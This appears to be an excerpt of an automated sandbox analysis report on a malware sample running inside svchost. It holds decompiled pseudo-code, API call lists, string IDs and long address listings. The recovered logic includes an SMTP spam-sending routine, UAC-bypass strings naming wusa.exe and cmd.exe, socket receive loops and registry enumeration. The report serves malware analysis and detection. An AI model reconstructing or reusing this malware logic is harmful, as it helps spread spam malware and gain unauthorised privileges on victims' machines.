                                                                                                                                  0x0251aadd
                                                                                                                                  0x0251aae4
                                                                                                                                  0x0251aae6
                                                                                                                                  0x0251aaec
                                                                                                                                  0x0251aaef
                                                                                                                                  0x0251ab00
                                                                                                                                  0x0251ab12
                                                                                                                                  0x0251ab1a
                                                                                                                                  0x0251ab29
                                                                                                                                  0x0251ab31
                                                                                                                                  0x0251ab33
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251ab33
                                                                                                                                  0x0251aaf1
                                                                                                                                  0x0251aaf4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aaf6
                                                                                                                                  0x0251aaf9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aafb
                                                                                                                                  0x0251aafe
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aafe
                                                                                                                                  0x0251aae8
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aae8
                                                                                                                                  0x0251aacc
                                                                                                                                  0x0251aacc
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aacc
                                                                                                                                  0x0251aaa2
                                                                                                                                  0x0251aaa9
                                                                                                                                  0x0251aaab
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aaad
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aaad
                                                                                                                                  0x0251aa59
                                                                                                                                  0x0251aa5f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aa61
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aa61
                                                                                                                                  0x0251aa06
                                                                                                                                  0x0251aa0c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aa0e
                                                                                                                                  0x0251aa14
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aa16
                                                                                                                                  0x0251aa1c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aa1e
                                                                                                                                  0x0251aa24
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aa26
                                                                                                                                  0x0251aa2c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aa2e
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aa2e
                                                                                                                                  0x0251a9db
                                                                                                                                  0x0251a8c8
                                                                                                                                  0x0251a8d2
                                                                                                                                  0x0251a8d4
                                                                                                                                  0x0251a8d6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a8e2
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a8eb
                                                                                                                                  0x0251a89c
                                                                                                                                  0x0251a8af
                                                                                                                                  0x0251a8b8
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a8b8
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a89c
                                                                                                                                  0x0251a7df
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a7ed
                                                                                                                                  0x0251a7f0
                                                                                                                                  0x0251a7f3
                                                                                                                                  0x0251a803
                                                                                                                                  0x0251a7f5
                                                                                                                                  0x0251a7f5
                                                                                                                                  0x0251a7f5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a845
                                                                                                                                  0x0251a848
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a852
                                                                                                                                  0x0251a855
                                                                                                                                  0x0251a84d
                                                                                                                                  0x0251a84d
                                                                                                                                  0x0251a7fa
                                                                                                                                  0x0251a7fb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a85c
                                                                                                                                  0x0251a85e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a86a
                                                                                                                                  0x0251a86c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a80a
                                                                                                                                  0x0251a80c
                                                                                                                                  0x0251a871
                                                                                                                                  0x0251a871
                                                                                                                                  0x0251a874
                                                                                                                                  0x0251a875
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a813
                                                                                                                                  0x0251a816
                                                                                                                                  0x0251a816
                                                                                                                                  0x0251a819
                                                                                                                                  0x0251a819
                                                                                                                                  0x0251a81b
                                                                                                                                  0x0251a81c
                                                                                                                                  0x0251a81c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a836
                                                                                                                                  0x0251a839
                                                                                                                                  0x0251a839
                                                                                                                                  0x0251a83c
                                                                                                                                  0x0251a83c
                                                                                                                                  0x0251a83e
                                                                                                                                  0x0251a83f
                                                                                                                                  0x0251a83f
                                                                                                                                  0x0251a820
                                                                                                                                  0x0251a824
                                                                                                                                  0x0251a82f
                                                                                                                                  0x0251a87a
                                                                                                                                  0x0251a87a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • wsprintfA.USER32 ref: 0251A7FB
                                                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,00000001), ref: 0251A87E
                                                                                                                                  • send.WS2_32(00000000,?,00000000,00000000), ref: 0251A893
                                                                                                                                  • wsprintfA.USER32 ref: 0251A8AF
                                                                                                                                  • send.WS2_32(00000000,.,00000005,00000000), ref: 0251A8D2
                                                                                                                                  • wsprintfA.USER32 ref: 0251A8E2
                                                                                                                                  • recv.WS2_32(00000000,?,000003F6,00000000), ref: 0251A97C
                                                                                                                                  • wsprintfA.USER32 ref: 0251A9B9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wsprintf$send$lstrlenrecv
                                                                                                                                  • String ID: .$AUTH LOGIN$ESMTP$Error sending command (sent = %d/%d)$Incorrect respons$Too big smtp respons (%d bytes)$Too small respons$data$ehlo %s$helo %s$localcfg$mail from:<%s>$quit$rcpt to:<%s>
                                                                                                                                  • API String ID: 3650048968-2394369944
                                                                                                                                  • Opcode ID: 430517b5767246f02a10ec62adf2c49957234757a22d6000103fe607dbc03bbd
                                                                                                                                  • Instruction ID: 20b9b4afa6f7cc4c4f8cfc7e4e4d739208e04d2bc2302f16f48f3160310ed041
                                                                                                                                  • Opcode Fuzzy Hash: 430517b5767246f02a10ec62adf2c49957234757a22d6000103fe607dbc03bbd
                                                                                                                                  • Instruction Fuzzy Hash: 1DA15871A42355BBFF238E64DC85FAE3B6ABB51318F140866F802A60C0DB31994CCB5D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02511280 Relevance: 30.2, APIs: 9, Strings: 8, Instructions: 417stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 0251139A
                                                                                                                                  • lstrlenW.KERNEL32(-00000003), ref: 02511571
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExecuteShelllstrlen
                                                                                                                                  • String ID: $%systemroot%\system32\cmd.exe$<$@$D$uac$useless$wusa.exe
                                                                                                                                  • API String ID: 1628651668-1839596206
                                                                                                                                  • Opcode ID: ba1c211d2c61a2bcaa69b127e29715d3f462dd0fa2efca7803880e721da11d97
                                                                                                                                  • Instruction ID: 92cb042bbb2b5a1025206ba676fd9d8b8c270984302ecab5cba023477b358a88
                                                                                                                                  • Opcode Fuzzy Hash: ba1c211d2c61a2bcaa69b127e29715d3f462dd0fa2efca7803880e721da11d97
                                                                                                                                  • Instruction Fuzzy Hash: 87F19EB55087419FE320DF64C888B6ABBE5FB89304F018D5DFA9A97280D774D848CF5A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02512A62 Relevance: 27.2, APIs: 18, Instructions: 194networkmemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 53%
                                                                                                                                  			E02512A62(void* __ecx, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v44;
				signed short _v272;
				char _v276;
				long _v280;
				char _v284;
				signed short _v288;
				signed short _v292;
				long _v300;
				long _v304;
				intOrPtr _v308;
				signed short _v324;
				intOrPtr _v332;
				signed short _v336;
				signed int _v340;
				signed int _v344;
				void* _v348;
				signed short _v352;
				signed short _v356;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t53;
				signed short _t66;
				void** _t71;
				void* _t76;
				void* _t77;
				void* _t78;
				signed short _t79;
				intOrPtr* _t81;
				signed short _t82;
				signed short _t83;
				intOrPtr _t86;
				signed int _t88;
				void* _t90;
				long _t91;
				signed short _t92;
				void* _t94;

				_t77 = __ecx;
				_t91 = 0;
				 *_a12 = 1;
				_t50 = HeapAlloc(GetProcessHeap(), 0, 0x1000);
				_t76 = _t50;
				if(_t76 != 0) {
					__imp__#23(2, 2, 0x11, _t78);
					_t79 = _t50;
					_v288 = _t79;
					if(_t79 == 0 || _t79 == 0xffffffff) {
						HeapFree(GetProcessHeap(), _t91, _t76);
						_t53 = 0;
						goto L37;
					} else {
						_v304 = 0;
						while(1) {
							_v300 = _t91;
							if(_v304 != _t91) {
								_push(_t91);
							} else {
								_push(0x100);
							}
							__imp__#9();
							_t50 = E025126FF(_v8, _t79, _v12, _t50 & 0x0000ffff);
							_t94 = _t94 + 0xc;
							if(_t50 != 0) {
								goto L32;
							}
							_t86 = 0xc;
							_t50 =  &_v276;
							_v272 = _t79;
							_v276 = 1;
							_v284 = _t86;
							_v280 = _t91;
							__imp__#18(_t91, _t50, _t91, _t91,  &_v284);
							if(_t50 <= 0) {
								goto L32;
							}
							_t50 = E0251EE2A(_t77, _t76, _t91, 4);
							_t94 = _t94 + 0xc;
							__imp__#16(_t79, _t76, 0x1000, _t91);
							_t92 = _t50;
							_v324 = _t92;
							if(_t92 > 0 && _t92 > _t86) {
								_t81 = __imp__#15;
								_t88 =  *_t81( *(_t76 + 2) & 0x0000ffff) & 0xf;
								if(_t88 == 3) {
									L34:
									 *_v44 = 2;
									L35:
									HeapFree(GetProcessHeap(), 0, _t76);
									__imp__#3(_v292);
									_t53 = _v308;
									L37:
									return _t53;
								}
								if(_t88 != 2) {
									L16:
									if(_t88 != 0) {
										goto L32;
									}
									_t50 = E02512923(_t77, _t76, _t92);
									_pop(_t77);
									_v336 = _t50;
									if(_t50 == 0) {
										goto L32;
									}
									_v340 = _v340 & 0x00000000;
									_v344 = _v344 & 0x00000000;
									_t82 = _t50;
									_v352 = _t82;
									L20:
									while(1) {
										if( *((short*)(_t82 + 0x10a)) != 1 ||  *((short*)(_t82 + 0x108)) != 0xf ||  *((short*)(_t82 + 0x10c)) < 3) {
											L30:
											_t83 =  *_t82;
											_v352 = _t83;
											if(_t83 != 0) {
												_t82 = _v352;
												continue;
											}
											goto L31;
										} else {
											_t90 = HeapAlloc(GetProcessHeap(), 0, 0x108);
											if(_t90 == 0) {
												L31:
												_t50 = E02512904(_v336);
												if(_v344 != 0) {
													goto L35;
												}
												goto L32;
											}
											E0251EE2A(_t77, _t90, 0, 0x108);
											_t66 =  *( *((intOrPtr*)(_t82 + 0x110)) + _t76) & 0x0000ffff;
											_t94 = _t94 + 0xc;
											__imp__#15();
											 *(_t90 + 4) = _t66 & 0x0000ffff;
											_t33 = _t90 + 8; // 0x8
											E02512871( *((intOrPtr*)(_t82 + 0x110)) + 2, _t76, _t77, _t33, _v332);
											_t77 = _t66;
											if( *((char*)(_t90 + 8)) != 0) {
												_t71 = _v344;
												_v344 = _t90;
												if(_t71 != 0) {
													 *_t71 = _t90;
												} else {
													_v348 = _t90;
												}
											} else {
												HeapFree(GetProcessHeap(), 0, _t90);
											}
											_t82 = _v356;
											goto L30;
										}
									}
								}
								_push( *(_t76 + 2) & 0x0000ffff);
								if( *_t81() < 0) {
									goto L34;
								}
								goto L16;
							}
							L32:
							_v308 = _v308 + 1;
							if(_v308 < 2) {
								_t79 = _v292;
								_t91 = 0;
								continue;
							}
							goto L35;
						}
					}
				}
				return 0;
			}










































                                                                                                                                  0x02512a62
                                                                                                                                  0x02512a7a
                                                                                                                                  0x02512a7d
                                                                                                                                  0x02512a86
                                                                                                                                  0x02512a8c
                                                                                                                                  0x02512a90
                                                                                                                                  0x02512aa0
                                                                                                                                  0x02512aa6
                                                                                                                                  0x02512aa8
                                                                                                                                  0x02512aae
                                                                                                                                  0x02512cd8
                                                                                                                                  0x02512cde
                                                                                                                                  0x00000000
                                                                                                                                  0x02512abd
                                                                                                                                  0x02512abd
                                                                                                                                  0x02512ac9
                                                                                                                                  0x02512ac9
                                                                                                                                  0x02512ad1
                                                                                                                                  0x02512ada
                                                                                                                                  0x02512ad3
                                                                                                                                  0x02512ad3
                                                                                                                                  0x02512ad3
                                                                                                                                  0x02512adb
                                                                                                                                  0x02512af4
                                                                                                                                  0x02512af9
                                                                                                                                  0x02512afe
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512b06
                                                                                                                                  0x02512b0e
                                                                                                                                  0x02512b14
                                                                                                                                  0x02512b18
                                                                                                                                  0x02512b20
                                                                                                                                  0x02512b24
                                                                                                                                  0x02512b28
                                                                                                                                  0x02512b30
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512b3a
                                                                                                                                  0x02512b3f
                                                                                                                                  0x02512b4a
                                                                                                                                  0x02512b50
                                                                                                                                  0x02512b52
                                                                                                                                  0x02512b58
                                                                                                                                  0x02512b6a
                                                                                                                                  0x02512b76
                                                                                                                                  0x02512b7c
                                                                                                                                  0x02512ca6
                                                                                                                                  0x02512cad
                                                                                                                                  0x02512cb3
                                                                                                                                  0x02512cbd
                                                                                                                                  0x02512cc7
                                                                                                                                  0x02512ccd
                                                                                                                                  0x02512ce0
                                                                                                                                  0x00000000
                                                                                                                                  0x02512ce0
                                                                                                                                  0x02512b85
                                                                                                                                  0x02512b96
                                                                                                                                  0x02512b98
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512ba1
                                                                                                                                  0x02512ba6
                                                                                                                                  0x02512ba7
                                                                                                                                  0x02512bad
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512bb3
                                                                                                                                  0x02512bb8
                                                                                                                                  0x02512bbd
                                                                                                                                  0x02512bbf
                                                                                                                                  0x00000000
                                                                                                                                  0x02512bc9
                                                                                                                                  0x02512bd1
                                                                                                                                  0x02512c77
                                                                                                                                  0x02512c77
                                                                                                                                  0x02512c79
                                                                                                                                  0x02512c7f
                                                                                                                                  0x02512bc5
                                                                                                                                  0x00000000
                                                                                                                                  0x02512bc5
                                                                                                                                  0x00000000
                                                                                                                                  0x02512bf3
                                                                                                                                  0x02512c08
                                                                                                                                  0x02512c0c
                                                                                                                                  0x02512c85
                                                                                                                                  0x02512c89
                                                                                                                                  0x02512c93
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512c93
                                                                                                                                  0x02512c12
                                                                                                                                  0x02512c1d
                                                                                                                                  0x02512c21
                                                                                                                                  0x02512c25
                                                                                                                                  0x02512c32
                                                                                                                                  0x02512c3e
                                                                                                                                  0x02512c41
                                                                                                                                  0x02512c4a
                                                                                                                                  0x02512c4b
                                                                                                                                  0x02512c5f
                                                                                                                                  0x02512c63
                                                                                                                                  0x02512c69
                                                                                                                                  0x02512c71
                                                                                                                                  0x02512c6b
                                                                                                                                  0x02512c6b
                                                                                                                                  0x02512c6b
                                                                                                                                  0x02512c4d
                                                                                                                                  0x02512c57
                                                                                                                                  0x02512c57
                                                                                                                                  0x02512c73
                                                                                                                                  0x00000000
                                                                                                                                  0x02512c73
                                                                                                                                  0x02512bd1
                                                                                                                                  0x02512bc9
                                                                                                                                  0x02512b8b
                                                                                                                                  0x02512b90
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512b90
                                                                                                                                  0x02512c95
                                                                                                                                  0x02512c95
                                                                                                                                  0x02512c9e
                                                                                                                                  0x02512ac3
                                                                                                                                  0x02512ac7
                                                                                                                                  0x00000000
                                                                                                                                  0x02512ac7
                                                                                                                                  0x00000000
                                                                                                                                  0x02512ca4
                                                                                                                                  0x02512ac9
                                                                                                                                  0x02512aae
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,761B4F20), ref: 02512A83
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,761B4F20), ref: 02512A86
                                                                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 02512AA0
                                                                                                                                  • htons.WS2_32(00000000), ref: 02512ADB
                                                                                                                                  • select.WS2_32 ref: 02512B28
                                                                                                                                  • recv.WS2_32(?,00000000,00001000,00000000), ref: 02512B4A
                                                                                                                                  • htons.WS2_32(?), ref: 02512B71
                                                                                                                                  • htons.WS2_32(?), ref: 02512B8C
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000108), ref: 02512BFB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heaphtons$Process$Allocrecvselectsocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1639031587-0
                                                                                                                                  • Opcode ID: 86b242a275df9e85afd1a7d6cabdc71c2cd7a924f2496283c16f7827e2b72214
                                                                                                                                  • Instruction ID: be2e8a79df0ea6aff354ab970e65b9ec0fb90ee296d014aaf3c156caad10fad6
                                                                                                                                  • Opcode Fuzzy Hash: 86b242a275df9e85afd1a7d6cabdc71c2cd7a924f2496283c16f7827e2b72214
                                                                                                                                  • Instruction Fuzzy Hash: B361D571904325AFE720AF64DC48B6BBBE8FB99759F010809FE45D7180D7B0D8588BA9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251704C Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 332registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                  			E0251704C(intOrPtr _a4, signed int* _a8, int _a12, int _a16, int* _a20) {
				CHAR* _v8;
				void* _v12;
				signed int _v16;
				int _v20;
				char _v24;
				char _v28;
				signed int _v32;
				char _v64;
				char _v363;
				char _v364;
				void _v400;
				intOrPtr* _t88;
				int* _t89;
				int* _t90;
				int* _t91;
				char* _t93;
				signed int _t96;
				signed int _t97;
				long _t99;
				signed int _t107;
				int _t109;
				int _t119;
				int _t121;
				int _t122;
				int _t123;
				signed int _t125;
				signed int* _t130;
				int _t136;
				int _t149;
				int _t155;
				void* _t158;
				signed int _t166;
				int _t196;
				signed int _t204;
				int _t206;
				void* _t207;
				void* _t208;
				void* _t210;
				void* _t211;

				_t88 = _a8;
				_t167 = 0;
				_v16 = 0x12c;
				_v24 = 0x20;
				_v364 = 0;
				if(_t88 != 0) {
					 *_t88 = 0;
				}
				_t89 = _a12;
				if(_t89 != _t167) {
					 *_t89 = _t167;
				}
				_t90 = _a16;
				if(_t90 != _t167) {
					 *_t90 = _t167;
				}
				_t91 = _a20;
				if(_t91 != _t167) {
					 *_t91 = _t167;
				}
				_t93 = E02512544(0x25222f8,  &E025206AC, 0x2e, 0xe4, 0xc8);
				_t208 = _t207 + 0x14;
				if(RegOpenKeyExA(0x80000001, _t93, _t167, 0x101,  &_v12) != 0) {
					L21:
					_t96 = E0251EE2A(_t167, 0x25222f8, 0, 0x100) | 0xffffffff;
					goto L22;
				} else {
					_t97 = E02516DC2(_t167);
					_push( &_v16);
					_push( &_v364);
					_push( &_v28);
					_v32 = _t97;
					_push(0);
					_push( &_v24);
					_t167 =  &_v64;
					_push( &_v64);
					_v8 = 0;
					_push(0);
					while(1) {
						_t99 = RegEnumValueA(_v12, ??, ??, ??, ??, ??, ??, ??);
						if(_t99 == 0x103) {
							break;
						}
						__eflags = _t99;
						if(_t99 != 0) {
							L18:
							_t25 =  &_v8;
							 *_t25 =  &(_v8[1]);
							__eflags =  *_t25;
							_push( &_v16);
							_push( &_v364);
							_push( &_v28);
							_push(0);
							_push( &_v24);
							_push( &_v64);
							_push(_v8);
							_v16 = 0x12c;
							_v24 = 0x20;
							continue;
						}
						__eflags = _v24 - _t99;
						if(_v24 <= _t99) {
							goto L18;
						}
						__eflags = _v16 - _t99;
						if(_v16 <= _t99) {
							goto L18;
						}
						__eflags = _v28 - 1;
						if(_v28 != 1) {
							goto L18;
						}
						_t107 = E0251EED1( &_v64, E02512544(0x25222f8,  &E025206A0, 9, 0xe4, 0xc8));
						_t210 = _t208 + 0x1c;
						asm("sbb eax, eax");
						_t109 =  ~_t107 + 1;
						__eflags = _t109;
						_v20 = _t109;
						if(_t109 != 0) {
							L23:
							_v8 = E0251EE95( &_v364, E02512544(0x25222f8,  &E0252069C, 4, 0xe4, 0xc8));
							E0251EE2A(_t167, 0x25222f8, 0, 0x100);
							_t211 = _t210 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								__eflags = _v364 - 0x22;
								if(_v364 == 0x22) {
									E0251EF00( &_v364,  &_v363);
									_t149 = E0251ED23( &_v364, 0x22);
									_t211 = _t211 + 0x10;
									__eflags = _t149;
									if(_t149 != 0) {
										 *_t149 = 0;
									}
								}
								_t196 = E0251EE95( &_v364, E02512544(0x25222f8, 0x2520694, 5, 0xe4, 0xc8));
								E0251EE2A(_t167, 0x25222f8, 0, 0x100);
								__eflags = _t196;
								if(_t196 != 0) {
									_t119 = E0251ED77( &_v364, _a4);
									__eflags = _t119;
									if(_t119 != 0) {
										 *_t196 = 0;
										_t121 = E0251ED23( &_v364, 0x5c);
										_v8 = _t121;
										__eflags = _t121;
										if(_t121 != 0) {
											_t63 =  &_v8;
											 *_t63 =  &(_v8[1]);
											__eflags =  *_t63;
										} else {
											_v8 =  &_v364;
										}
										_t122 = E02516CAD(_v8);
										__eflags = _t122;
										if(_t122 != 0) {
											_pop(_t204);
											_push(0x8b00007e);
											asm("lock xor esi, 0x55555555");
											_v16 = _t204;
											_t166 = _t204 >> 0x00000008 & 0x000000ff;
											_t123 = E02516C96(_t204);
											__eflags = _t123;
											if(_t123 != 0) {
												L57:
												RegCloseKey(_v12);
												__eflags = _a16;
												if(_a16 != 0) {
													E0251EF00(_a16,  &_v64);
												}
												_t125 = 0;
												__eflags = _v20;
												 *_t196 = 0x2e;
												goto L34;
											}
											__eflags = _t166 - 0x40 - 0x3f;
											if(_t166 - 0x40 > 0x3f) {
												goto L57;
											}
											__eflags = (_t204 & 0x000000ff) - 0x10;
											if((_t204 & 0x000000ff) >= 0x10) {
												goto L57;
											}
											_t206 = _a12;
											 *_t196 = 0x2e;
											__eflags = _t206;
											if(_t206 != 0) {
												_t136 = GetFileAttributesExA( &_v364, 0,  &_v400);
												__eflags = _t136;
												if(_t136 != 0) {
													 *_t206 = 1;
												}
											}
											_t130 = _a8;
											__eflags = _t130;
											if(_t130 != 0) {
												 *_t130 = _t166;
											}
											__eflags = _a16;
											if(_a16 != 0) {
												E0251EF00(_a16,  &_v64);
											}
											__eflags = _a20;
											if(_a20 != 0) {
												E0251EF00(_a20, _v8);
											}
											_t125 = 0;
											__eflags = _v20;
											goto L34;
										} else {
											RegCloseKey(_v12);
											__eflags = _a16;
											if(_a16 != 0) {
												E0251EF00(_a16,  &_v64);
											}
											 *_t196 = 0x2e;
											goto L33;
										}
									}
									RegCloseKey(_v12);
									_t96 = 0;
									goto L22;
								} else {
									RegCloseKey(_v12);
									__eflags = _a16;
									if(_a16 != 0) {
										E0251EF00(_a16,  &_v64);
									}
									L33:
									_t125 = 0;
									__eflags = _v20;
									L34:
									_t96 = (_t125 & 0xffffff00 | __eflags == 0x00000000) + 1;
									L22:
									return _t96;
								}
							}
							RegCloseKey(_v12);
							__eflags = _a16;
							if(_a16 != 0) {
								E0251EF00(_a16,  &_v64);
							}
							_t96 = 1;
							goto L22;
						}
						_t155 = E02516CAD( &_v64);
						_pop(_t167);
						__eflags = _t155;
						if(_t155 == 0) {
							L17:
							E0251EE2A(_t167, 0x25222f8, 0, 0x100);
							_t208 = _t210 + 0xc;
							goto L18;
						}
						_t158 = E0251F1A5( &_v64);
						_t167 = _v32 ^ 0x5e5e5e5e;
						__eflags = _t158 - (_v32 ^ 0x5e5e5e5e);
						if(_t158 == (_v32 ^ 0x5e5e5e5e)) {
							goto L23;
						}
						goto L17;
					}
					RegCloseKey(_v12);
					goto L21;
				}
			}










































                                                                                                                                  0x02517055
                                                                                                                                  0x02517058
                                                                                                                                  0x0251705a
                                                                                                                                  0x02517061
                                                                                                                                  0x02517068
                                                                                                                                  0x02517071
                                                                                                                                  0x02517073
                                                                                                                                  0x02517073
                                                                                                                                  0x02517075
                                                                                                                                  0x0251707a
                                                                                                                                  0x0251707c
                                                                                                                                  0x0251707c
                                                                                                                                  0x0251707e
                                                                                                                                  0x02517083
                                                                                                                                  0x02517085
                                                                                                                                  0x02517085
                                                                                                                                  0x02517087
                                                                                                                                  0x0251708c
                                                                                                                                  0x0251708e
                                                                                                                                  0x0251708e
                                                                                                                                  0x025170b4
                                                                                                                                  0x025170b9
                                                                                                                                  0x025170ca
                                                                                                                                  0x025171b8
                                                                                                                                  0x025171c8
                                                                                                                                  0x00000000
                                                                                                                                  0x025170d0
                                                                                                                                  0x025170d0
                                                                                                                                  0x025170d8
                                                                                                                                  0x025170df
                                                                                                                                  0x025170e3
                                                                                                                                  0x025170e4
                                                                                                                                  0x025170e9
                                                                                                                                  0x025170ed
                                                                                                                                  0x025170ee
                                                                                                                                  0x025170f1
                                                                                                                                  0x025170f2
                                                                                                                                  0x025170f5
                                                                                                                                  0x0251719b
                                                                                                                                  0x0251719e
                                                                                                                                  0x025171a9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x025170fb
                                                                                                                                  0x025170fd
                                                                                                                                  0x0251716e
                                                                                                                                  0x0251716e
                                                                                                                                  0x0251716e
                                                                                                                                  0x0251716e
                                                                                                                                  0x02517174
                                                                                                                                  0x0251717b
                                                                                                                                  0x0251717f
                                                                                                                                  0x02517180
                                                                                                                                  0x02517185
                                                                                                                                  0x02517189
                                                                                                                                  0x0251718a
                                                                                                                                  0x0251718d
                                                                                                                                  0x02517194
                                                                                                                                  0x00000000
                                                                                                                                  0x02517194
                                                                                                                                  0x025170ff
                                                                                                                                  0x02517102
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517104
                                                                                                                                  0x02517107
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517109
                                                                                                                                  0x0251710d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517123
                                                                                                                                  0x02517128
                                                                                                                                  0x0251712d
                                                                                                                                  0x0251712f
                                                                                                                                  0x0251712f
                                                                                                                                  0x02517130
                                                                                                                                  0x02517133
                                                                                                                                  0x025171d0
                                                                                                                                  0x025171f4
                                                                                                                                  0x025171f7
                                                                                                                                  0x025171fc
                                                                                                                                  0x025171ff
                                                                                                                                  0x02517203
                                                                                                                                  0x02517227
                                                                                                                                  0x0251722e
                                                                                                                                  0x0251723e
                                                                                                                                  0x0251724c
                                                                                                                                  0x02517251
                                                                                                                                  0x02517254
                                                                                                                                  0x02517256
                                                                                                                                  0x02517258
                                                                                                                                  0x02517258
                                                                                                                                  0x02517256
                                                                                                                                  0x02517280
                                                                                                                                  0x02517282
                                                                                                                                  0x0251728a
                                                                                                                                  0x0251728c
                                                                                                                                  0x025172c2
                                                                                                                                  0x025172c9
                                                                                                                                  0x025172cb
                                                                                                                                  0x025172e6
                                                                                                                                  0x025172e8
                                                                                                                                  0x025172ef
                                                                                                                                  0x025172f2
                                                                                                                                  0x025172f4
                                                                                                                                  0x02517301
                                                                                                                                  0x02517301
                                                                                                                                  0x02517301
                                                                                                                                  0x025172f6
                                                                                                                                  0x025172fc
                                                                                                                                  0x025172fc
                                                                                                                                  0x02517307
                                                                                                                                  0x0251730d
                                                                                                                                  0x0251730f
                                                                                                                                  0x02517338
                                                                                                                                  0x02517339
                                                                                                                                  0x0251733e
                                                                                                                                  0x0251734b
                                                                                                                                  0x0251734e
                                                                                                                                  0x02517354
                                                                                                                                  0x0251735b
                                                                                                                                  0x0251735d
                                                                                                                                  0x025173d5
                                                                                                                                  0x025173d8
                                                                                                                                  0x025173de
                                                                                                                                  0x025173e2
                                                                                                                                  0x025173eb
